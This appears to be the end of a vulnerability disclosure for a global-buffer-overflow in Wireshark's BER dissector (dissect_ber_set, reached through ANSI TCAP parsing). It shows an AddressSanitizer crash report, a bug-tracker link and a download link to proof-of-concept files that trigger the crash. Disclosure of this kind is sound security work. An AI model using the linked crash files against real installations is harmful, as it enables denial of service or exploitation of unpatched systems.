#83 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#84 0x53c91b in process_packet wireshark/tshark.c:3728:5
#85 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#86 0x52c1df in main wireshark/tshark.c:2197:13
0x000005676c18 is located 8 bytes to the left of global variable '<string literal>' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:131:43' (0x5676c20) of size 15
'<string literal>' is ascii string 'queryWithPerm '
0x000005676c18 is located 24 bytes to the right of global variable 'T_paramSet_set' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:183:29' (0x5676be0) of size 32
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ber.c:2588:64 in dissect_ber_set
Shadow bytes around the buggy address:
0x000080ac6d30: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000080ac6d40: 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
0x000080ac6d50: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x000080ac6d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9
0x000080ac6d70: f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 00 00 00 00
=>0x000080ac6d80: f9 f9 f9[f9]00 07 f9 f9 f9 f9 f9 f9 00 00 00 00
0x000080ac6d90: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x000080ac6da0: 00 00 02 f9 f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9
0x000080ac6db0: 00 00 06 f9 f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9
0x000080ac6dc0: 07 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000080ac6dd0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==7855==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11796. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39484.zip